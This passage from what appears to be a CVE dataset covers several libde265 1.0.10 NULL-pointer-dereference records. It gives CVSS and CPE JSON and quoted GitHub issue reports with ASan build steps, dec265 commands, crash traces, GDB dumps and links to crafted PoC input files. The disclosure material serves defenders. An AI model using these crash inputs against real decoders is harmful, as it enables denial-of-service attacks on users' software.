rip 0x000055555570c29d eflags [ PF ZF IF RF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
722 }
723
724 extern __inline void __attribute__((__gnu_inline__, __always_inline__, __artificial__))
725 _mm_storeu_si128 (__m128i_u *__P, __m128i __B)
726 {
727 *__P = __B;
728 }
729
730 extern __inline void __attribute__((__gnu_inline__, __always_inline__, __artificial__))
731 _mm_storel_epi64 (__m128i_u *__P, __m128i __B)
─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[0] from 0x000055555570c29d in _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+129 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
[1] from 0x000055555570c29d in ff_hevc_put_weighted_pred_avg_8_sse(unsigned char*, long, short const*, short const*, long, int, int)+1711 at sse-motion.cc:237
[2] from 0x00005555557b9c1a in acceleration_functions::put_weighted_pred_avg(void*, long, short const*, short const*, long, int, int, int) const+282 at ../libde265/acceleration.h:249
[3] from 0x00005555557a1a6b in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+18639 at motion.cc:544
[4] from 0x00005555557b973f in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+496 at motion.cc:2155
[5] from 0x0000555555683317 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int)+2790 at slice.cc:4136
[6] from 0x00005555556878c2 in read_coding_unit(thread_context*, int, int, int, int)+14437 at slice.cc:4497
[7] from 0x0000555555689e18 in read_coding_quadtree(thread_context*, int, int, int, int)+3873 at slice.cc:4652
[8] from 0x0000555555672a98 in read_coding_tree_unit(thread_context*)+1351 at slice.cc:2861
[9] from 0x000055555568af7c in decode_substream(thread_context*, bool, bool)+4333 at slice.cc:4741
[+]
─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[1] id 3335404 name dec265 from 0x000055555570c29d in _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+129 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
arg __B = {[0] = 0, [1] = 0}, __P = 0x0: Cannot access memory at address 0x0
loc x = 0, y = 0, dst = 0x0: Cannot access memory at address 0x0, r0 = {[0] = 0, [1] = 0}, r1 = {[0] = 0, [1] = 0}, f0 = {[0] = 18014673391583296, [1] = 18014673391583296}, r2 = {[0] = 0, [1] = 0}, r3 = {[0] = 0, [1] = 0}
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>>>
```
# Impact
This vulnerability is capable of crashing software, causing a denial of service via a crafted input file. | NULL Pointer Dereference in function ff_hevc_put_weighted_pred_avg_8_sse at sse-motion.cc:237 | https://api.github.com/repos/strukturag/libde265/issues/382/comments | 2 | 2023-01-29T08:14:34Z | 2023-03-04T07:40:02Z | https://github.com/strukturag/libde265/issues/382 | 1,561,180,454 | 382 |
CVE-2023-24755 | 2023-03-01T15:15:11.577 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the put_weighted_pred_8_fallback function at fallback-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/384"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/strukturag/libde265/issues/384 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function put_weighted_pred_8_fallback at fallback-motion.cc:69
# Version
```
git log
commit 7ea8e3cbb010bc02fa38419e87ed2281d7933850 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <[email protected]>
Date: Sat Jan 28 15:03:34 2023 +0100
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_segv08.bin
WARNING: non-existing PPS referenced
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3596870==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x5555555e5c61 bp 0x7ffffffe2930 sp 0x7ffffffe28e0 T0)
==3596870==The signal is caused by a WRITE memory access.
==3596870==Hint: address points to the zero page.
#0 0x5555555e5c60 in put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int) /home/fuzz/libde265/libde265/fallback-motion.cc:69
#1 0x5555557ba002 in acceleration_functions::put_weighted_pred(void*, long, short const*, long, int, int, int, int, int, int) const ../libde265/acceleration.h:272
#2 0x5555557a124f in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:512
#3 0x5555557b973e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2155
#4 0x5555556848c0 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4314
#5 0x555555689e17 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#6 0x555555672a97 in read_coding_tree_unit(thread_context*) /home/fuzz/libde265/libde265/slice.cc:2861
#7 0x55555568af7b in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#8 0x55555568ea3f in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#9 0x55555558c205 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#10 0x55555558d6c0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#11 0x55555558a7dc in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#12 0x555555589efc in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:697
#13 0x55555559070e in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#14 0x555555592354 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#15 0x55555557cffa in de265_decode /home/fuzz/libde265/libde265/de265.cc:362
#16 0x555555577b2f in main /home/fuzz/libde265/dec265/dec265.cc:764
#17 0x7ffff7046082 in __libc_start_main ../csu/libc-start.c:308
#18 0x5555555712ed in _start (/home/fuzz/libde265/dec265/dec265+0x1d2ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/fuzz/libde265/libde265/fallback-motion.cc:69 in put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)
==3596870==ABORTING
```
# POC
[poc_segv08.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_segv08.bin)
# GDB
```
gdb --args ./dec265 ./poc_segv08.bin
─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
WARNING: non-existing PPS referenced
Program received signal SIGSEGV, Segmentation fault.
0x00005555555e5c61 in put_weighted_pred_8_fallback (dst=0x0, dststride=0, src=0x7ffffffe6c90, srcstride=8, width=8, height=8, w=1, o=0, log2WD=6) at fallback-motion.cc:69
69 out[0] = Clip1_8bit(((in[0]*w + rnd)>>log2WD) + o);
─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x00005555555e5c51 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1111 test %cl,%cl
0x00005555555e5c53 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1113 je 0x5555555e5c5d <put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1123>
0x00005555555e5c55 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1115 mov %rdx,%rdi
0x00005555555e5c58 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1118 callq 0x555555570e00 <__asan_report_store1@plt>
0x00005555555e5c5d put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1123 mov -0x8(%rbp),%rdx
0x00005555555e5c61 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1127 mov %dil,(%rdx)
0x00005555555e5c64 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1130 addq $0x1,-0x8(%rbp)
0x00005555555e5c69 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1135 addq $0x2,-0x10(%rbp)
0x00005555555e5c6e put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1140 addl $0x1,-0x18(%rbp)
0x00005555555e5c72 put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1144 jmpq 0x5555555e5a29 <put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+559>
─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
rax 0x000055555581d520 rbx 0x00007ffffffeedb0 rcx 0x0000000000000000 rdx 0x0000000000000000 rsi 0x0000000000000000 rdi 0x0000000000000000 rbp 0x00007ffffffe28e0 rsp 0x00007ffffffe2890
r8 0x0000000000000000 r9 0x0000000000000008 r10 0x00005555555e57fa r11 0x0000000000000000 r12 0x000055555581d520 r13 0x0000000000000010 r14 0x00000fffffffc55e r15 0x00007ffffffe2af0
rip 0x00005555555e5c61 eflags [ PF ZF IF RF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
64 for (int y=0;y<height;y++) {
65 const int16_t* in = &src[y*srcstride];
66 uint8_t* out = &dst[y*dststride];
67
68 for (int x=0;x<width;x++) {
69 out[0] = Clip1_8bit(((in[0]*w + rnd)>>log2WD) + o);
70 out++; in++;
71 }
72 }
73 }
─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[0] from 0x00005555555e5c61 in put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1127 at fallback-motion.cc:69
[1] from 0x00005555557ba003 in acceleration_functions::put_weighted_pred(void*, long, short const*, long, int, int, int, int, int, int) const+295 at ../libde265/acceleration.h:272
[2] from 0x00005555557a1250 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+16564 at motion.cc:512
[3] from 0x00005555557b973f in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+496 at motion.cc:2155
[4] from 0x00005555556848c1 in read_coding_unit(thread_context*, int, int, int, int)+2148 at slice.cc:4314
[5] from 0x0000555555689e18 in read_coding_quadtree(thread_context*, int, int, int, int)+3873 at slice.cc:4652
[6] from 0x0000555555672a98 in read_coding_tree_unit(thread_context*)+1351 at slice.cc:2861
[7] from 0x000055555568af7c in decode_substream(thread_context*, bool, bool)+4333 at slice.cc:4741
[8] from 0x000055555568ea40 in read_slice_segment_data(thread_context*)+1762 at slice.cc:5054
[9] from 0x000055555558c206 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*)+3516 at decctx.cc:852
[+]
─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[1] id 3600511 name dec265 from 0x00005555555e5c61 in put_weighted_pred_8_fallback(unsigned char*, long, short const*, long, int, int, int, int, int)+1127 at fallback-motion.cc:69
─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
arg dst = 0x0: Cannot access memory at address 0x0, dststride = 0, src = 0x7ffffffe6c90: 0, srcstride = 8, width = 8, height = 8, w = 1, o = 0, log2WD = 6
loc x = 0, in = 0x7ffffffe6c90: 0, out = 0x0: Cannot access memory at address 0x0, y = 0, __PRETTY_FUNCTION__ = "void put_weighted_pred_8_fallback(uint8_t*, ptrdiff_t, const int16_t*, ptrdiff_t, int, int, int, in…, rnd = 32
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>>> p out
$1 = (uint8_t *) 0x0
>>>
```
# Impact
This vulnerability is capable of crashing software, causing a denial of service via a crafted input file.
| NULL Pointer Dereference in function put_weighted_pred_8_fallback at fallback-motion.cc:69 | https://api.github.com/repos/strukturag/libde265/issues/384/comments | 2 | 2023-01-29T08:15:40Z | 2023-03-04T07:40:24Z | https://github.com/strukturag/libde265/issues/384 | 1,561,180,905 | 384 |
CVE-2023-24756 | 2023-03-01T15:15:11.623 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_unweighted_pred_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/380"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/strukturag/libde265/issues/380 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function ff_hevc_put_unweighted_pred_8_sse at sse-motion.cc:116
# Version
```
git log
commit 7ea8e3cbb010bc02fa38419e87ed2281d7933850 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <[email protected]>
Date: Sat Jan 28 15:03:34 2023 +0100
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_segv07.bin
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3406714==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555570a768 bp 0x7ffffffe28e0 sp 0x7ffffffe2620 T0)
==3406714==The signal is caused by a WRITE memory access.
==3406714==Hint: address points to the zero page.
#0 0x55555570a767 in _mm_storeu_si128(long long __vector(2)*, long long __vector(2)) /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
#1 0x55555570a767 in ff_hevc_put_unweighted_pred_8_sse(unsigned char*, long, short const*, long, int, int) /home/fuzz/libde265/libde265/x86/sse-motion.cc:116
#2 0x5555557b9e08 in acceleration_functions::put_unweighted_pred(void*, long, short const*, long, int, int, int) const ../libde265/acceleration.h:260
#3 0x5555557a2a90 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:611
#4 0x5555557b973e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2155
#5 0x555555683316 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4136
#6 0x555555687a08 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4500
#7 0x555555689e17 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#8 0x555555672a97 in read_coding_tree_unit(thread_context*) /home/fuzz/libde265/libde265/slice.cc:2861
#9 0x55555568af7b in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#10 0x55555568ea3f in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#11 0x55555558c205 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#12 0x55555558d6c0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#13 0x55555558a7dc in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#14 0x555555589efc in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:697
#15 0x55555559070e in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#16 0x555555592354 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#17 0x55555557cffa in de265_decode /home/fuzz/libde265/libde265/de265.cc:362
#18 0x555555577b2f in main /home/fuzz/libde265/dec265/dec265.cc:764
#19 0x7ffff7046082 in __libc_start_main ../csu/libc-start.c:308
#20 0x5555555712ed in _start (/home/fuzz/libde265/dec265/dec265+0x1d2ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727 in _mm_storeu_si128(long long __vector(2)*, long long __vector(2))
==3406714==ABORTING
```
# POC
[poc_segv07.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_segv07.bin)
# GDB
```
gdb --args ./dec265 ./poc_segv07.bin
─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
Program received signal SIGSEGV, Segmentation fault.
0x000055555570a768 in _mm_storeu_si128(long long __vector(2)*, long long __vector(2)) (__B=..., __P=0x0) at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
727 *__P = __B;
─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x000055555570a74c _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+101 mov $0x10,%esi
0x000055555570a751 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+106 mov %rdx,%rdi
0x000055555570a754 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+109 callq 0x555555571040 <__asan_report_store_n@plt>
0x000055555570a759 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+114 movdqa -0x1b0(%rbp),%xmm0
0x000055555570a761 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+122 mov -0x258(%rbp),%rdx
0x000055555570a768 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+129 movups %xmm0,(%rdx)
0x000055555570a76b _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+132 nop
~
~
~
─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Memory ───────────────────────────────────────────────────────────────────────────���────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
rax 0x000055555581d520 rbx 0x00007ffffffeed20 rcx 0x0000000000000000 rdx 0x0000000000000000 rsi 0x0000000000000007 rdi 0x0000000000000000 rbp 0x00007ffffffe2890 rsp 0x00007ffffffe25d0
r8 0x0000000000000000 r9 0x0000000000000020 r10 0x0000000000000020 r11 0x0000000000000020 r12 0x000055555581d520 r13 0x0000000000000010 r14 0x00000fffffffc54c r15 0x00007ffffffe2a60
rip 0x000055555570a768 eflags [ PF ZF IF RF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
722 }
723
724 extern __inline void __attribute__((__gnu_inline__, __always_inline__, __artificial__))
725 _mm_storeu_si128 (__m128i_u *__P, __m128i __B)
726 {
727 *__P = __B;
728 }
729
730 extern __inline void __attribute__((__gnu_inline__, __always_inline__, __artificial__))
731 _mm_storel_epi64 (__m128i_u *__P, __m128i __B)
─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[0] from 0x000055555570a768 in _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+129 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
[1] from 0x000055555570a768 in ff_hevc_put_unweighted_pred_8_sse(unsigned char*, long, short const*, long, int, int)+1426 at sse-motion.cc:116
[2] from 0x00005555557b9e09 in acceleration_functions::put_unweighted_pred(void*, long, short const*, long, int, int, int) const+281 at ../libde265/acceleration.h:260
[3] from 0x00005555557a2a91 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+22773 at motion.cc:611
[4] from 0x00005555557b973f in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+496 at motion.cc:2155
[5] from 0x0000555555683317 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int)+2790 at slice.cc:4136
[6] from 0x0000555555687a09 in read_coding_unit(thread_context*, int, int, int, int)+14764 at slice.cc:4500
[7] from 0x0000555555689e18 in read_coding_quadtree(thread_context*, int, int, int, int)+3873 at slice.cc:4652
[8] from 0x0000555555672a98 in read_coding_tree_unit(thread_context*)+1351 at slice.cc:2861
[9] from 0x000055555568af7c in decode_substream(thread_context*, bool, bool)+4333 at slice.cc:4741
[+]
─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[1] id 3410517 name dec265 from 0x000055555570a768 in _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+129 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
arg __B = {[0] = 0, [1] = 0}, __P = 0x0: Cannot access memory at address 0x0
loc x = 0, y = 0, dst = 0x0: Cannot access memory at address 0x0, r0 = {[0] = 0, [1] = 0}, r1 = {[0] = 0, [1] = 0}, f0 = {[0] = 9007336695791648, [1] = 9007336695791648}
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>>>
```
# Impact
This vulnerability is capable of crashing software, causing a denial of service via a crafted input file. | NULL Pointer Dereference in function ff_hevc_put_unweighted_pred_8_sse at sse-motion.cc:116 | https://api.github.com/repos/strukturag/libde265/issues/380/comments | 1 | 2023-01-29T08:12:53Z | 2023-03-04T07:41:52Z | https://github.com/strukturag/libde265/issues/380 | 1,561,180,071 | 380 |
CVE-2023-24757 | 2023-03-01T15:15:11.683 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the put_unweighted_pred_16_fallback function at fallback-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/385"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
